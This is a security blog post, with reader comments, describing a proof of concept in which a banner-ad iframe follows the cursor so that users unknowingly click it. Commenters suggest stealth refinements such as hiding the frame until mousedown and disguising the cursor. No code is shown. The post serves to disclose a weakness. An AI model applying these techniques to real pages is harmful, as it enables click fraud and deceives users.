Paid Advertising
web application security lab

Stealing Mouse Clicks for Banner Fraud

On the board Lobas asked a question regarding stealing clicks. The short answer is you cannot force a click inside of an iframe on another domain. The cross domain policy prohibits that, especially since inside banner advertizers you never know what the links will be. However, there is another way that Jeremiah Grossman mentioned a while back that I thought was pretty clever. You can actually move the banner ad to be placed immediately below the mouse so that when it’s clicked the user is tricked into sending their click event to the iframe beneath the cursor.

I wrote a sample code off of one of those annoying cursor following scripts to show that you can force text in a div (what could be an iframe to the banner ad) to be placed immediately below the image. What I haven’t shown is that the onclick event handler can be used to make the div appear at the right moment, or that you can make it semi-transparent or any of the other fun tricks. But this proof of concept proves that iframes are not really a particularly good way of protecting from click events. Banner advertisers beware!

7 Responses to “Stealing Mouse Clicks for Banner Fraud”

  1. jonass Says:

    nice example. try to improve by setting the iframe hidden (display:none) by default, and only make it visible with onmousedown-event (event already before click).

  2. MERLiiN Says:


    Although I am sure this could be optimized or affected by on click calls, you can currently defeat the travelling banner by clicking, holding the button down, then slide it onto your here link and release. This might actually be more annoying than your mailto refresh and you have just made sure the scammers can earn money by abusing XSS “the simple way(tm)”. Expect to see this or deratives in the wild..

  3. Coolv Says:

    This would work even better if you changed the cursor via DHTML or CSS in order to make it look like there was no image under the cursor. Also consider what jonass stated.

  4. maluc Says:

    If you both read the second to last sentence: “What I haven’t shown is that the onclick event handler can be used to make the div appear at the right moment, or that you can make it semi-transparent or any of the other fun tricks.” .. you would realize that he already said that. The purpose of a proof of concept is to demonstrate the concept. Demonstrations are kinda difficult to show when everything is invisible.. thus the purpose of keeping it visible for now.

    In an actual exploit you would obviously make it hidden for stealthiness.

    Nice PoC Rsnake, jeremiah’s mentioned it several times on his blog, but it’s good to have examples when explaining things to my not-so-tech-savvy friends, about what i waste my free time doing ^^

  5. RSnake Says:

    Thank you Maluc, I couldn’t have said it better myself. Yes, the example I’ve shown is slightly visible in Firefox (not completely invisible but if you can’t figure out how to change the three variables required to make it completely invisible you probably should avoid using this as an actual exploit). :) And, btw, this doesn’t work well for Internet Explorer, but you get the idea. Again, just a proof of concept.

  6. Coolv Says:

    Yes, I did read that sentence. In my opinion, however, making the cursor seem “real” would be a better demonstration of how this can be a real problem for normal users struggling with rampant advertising.

  7. RSnake Says:

    Coolv, and I think what you are failing to understand is that this is a proof of concept. It’s not meant to actually try to steal banner clicks but rather to show that it’s possible. I also didn’t show that you need to inject this via XSS on the site in question or build it into the site you want it to be built into, or how the page underneath needs to be constructed to make certain you are in fact clicking on the banner underneath. All of that stuff is relatively easy in comparison with the PoC.

    If you’ve spent any time looking at the XSS cheat sheet, for instance, you’ll see that not once in the 100 or so examples did I put an actual cookie stealing script anywhere in them. If you look at Jeremiah’s XML login detector it’s not even automated. If you look at the Firefox plugin detector it doesn’t even bother to log the results.

    The point isn’t to show exactly how to do it, it’s to show that it can be done. The rest is up to the person developing the code.